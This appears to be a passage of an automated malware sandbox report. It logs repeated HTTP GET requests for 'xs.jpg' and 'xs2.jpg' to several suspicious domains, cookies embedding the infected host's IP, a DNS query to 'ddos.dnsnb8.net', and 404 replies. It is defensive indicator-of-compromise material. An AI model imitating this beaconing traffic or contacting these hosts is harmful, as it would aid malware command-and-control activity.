        Source: global trafficHTTP traffic detected: GET /xs.jpg?a9f1e262=1407435972 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5829e9af=-1051767432 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?25df21c8=788074048 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159445|1720159259|4|46|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?327e2a9f=-118642122 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159446|1720159259|4|46|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?22eaebd4=-1365861596 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159447|1720159260|4|46|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7dfe147e=-67360516 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?6f42bef3=181614757 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?80947de5=58389342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159450|1720159259|4|47|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?48dbc808=-1850241008 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159450|1720159259|4|47|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2c73ccc=186446640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159451|1720159260|4|47|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5a80b326=-737830608 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?626616cd=-335646207 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f260cef5=-685609761 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159454|1720159259|4|48|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?216d3e73=-930122062 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159454|1720159259|4|48|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9e2ac5aa=2024478376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159455|1720159260|4|48|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ef46a9a2=-1402908630 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?37f8d56f=1339359386 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?939b7bae=155214274 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159458|1720159259|4|49|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?67316d6f=898910285 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159459|1720159259|4|49|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?baebcf66=1295391228 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159459|1720159260|4|49|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6582b518=-1852285480 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1b99da6=86825202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9055f4a9=-1873414999 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159463|1720159259|4|50|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?dbb63107=-575567816 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159463|1720159259|4|50|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c7d4d608=1993464376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159464|1720159260|4|50|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?787713d7=1515414323 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?8a282b2c=-954651084 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b3df36a1=1740533058 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159467|1720159259|4|51|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a62d3528=-1506986712 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159467|1720159259|4|51|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5f87de0d=2115991604 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159468|1720159260|4|51|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?baaa592=1761595938 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a5242bcc=-834303444 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9ad6cfae=1905085726 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159471|1720159259|4|52|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9f1f7a44=-1743041436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159472|1720159259|4|52|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ea3b604f=-1460829892 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159472|1720159260|4|52|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3fc8f944=1041285988 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?e4bc5c05=1550460958 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5eb9eca6=-1116481204 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159476|1720159259|4|53|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?35f32514=1810254376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159476|1720159259|4|53|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?741b0543=1947927875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159477|1720159260|4|53|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?f3a2ce17=-2074342170 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a8241ece=-1855376372 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?91387e43=-1405817186 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159481|1720159259|4|54|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2322230a=-1347768526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159481|1720159259|4|54|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5e41367=98833255 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159482|1720159260|4|54|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?8effb8fc=117276892 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1964acc0=1278084672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d090ea93=-795809133 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159485|1720159259|4|55|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9ba60573=343684734 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159485|1720159259|4|55|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?fc675e35=-120669078 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159486|1720159260|4|55|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9a7e303d=-814051145 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?325396b5=-1835223640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?17f3b14d=-1883887666 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159489|1720159259|4|56|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?912c2e80=445489792 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159490|1720159259|4|56|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1ad41f3e=450109246 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159490|1720159260|4|56|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d1cd8e49=1614413969 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?45eba6e7=794638136 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8021ab3c=-2145277124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159493|1720159259|4|57|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a8434aa9=-1471984983 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159494|1720159259|4|57|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b7b2891=1733586201 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159494|1720159260|4|57|0; snkz=8.46.123.33
        Source: SearchApp.exe, 0000001F.00000000.1593174717.000001D62DC64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: $www.google.www.yahoo.cn.bing.https://www.baidu.www.bing.www.yandex.google chrome equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
        Source: global trafficDNS traffic detected: DNS query: althawry.org
        Source: global trafficDNS traffic detected: DNS query: www.careerdesk.org
        Source: global trafficDNS traffic detected: DNS query: arthur.niria.biz
        Source: global trafficDNS traffic detected: DNS query: amsamex.com
        Source: global trafficDNS traffic detected: DNS query: apple-pie.in
        Source: global trafficDNS traffic detected: DNS query: ahmediye.net
        Source: global trafficDNS traffic detected: DNS query: g2.arrowhitech.com
        Source: global trafficDNS traffic detected: DNS query: ampyazilim.com.tr
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 05 Jul 2024 06:01:01 GMT Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:02:11 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:02:15 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:02:19 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
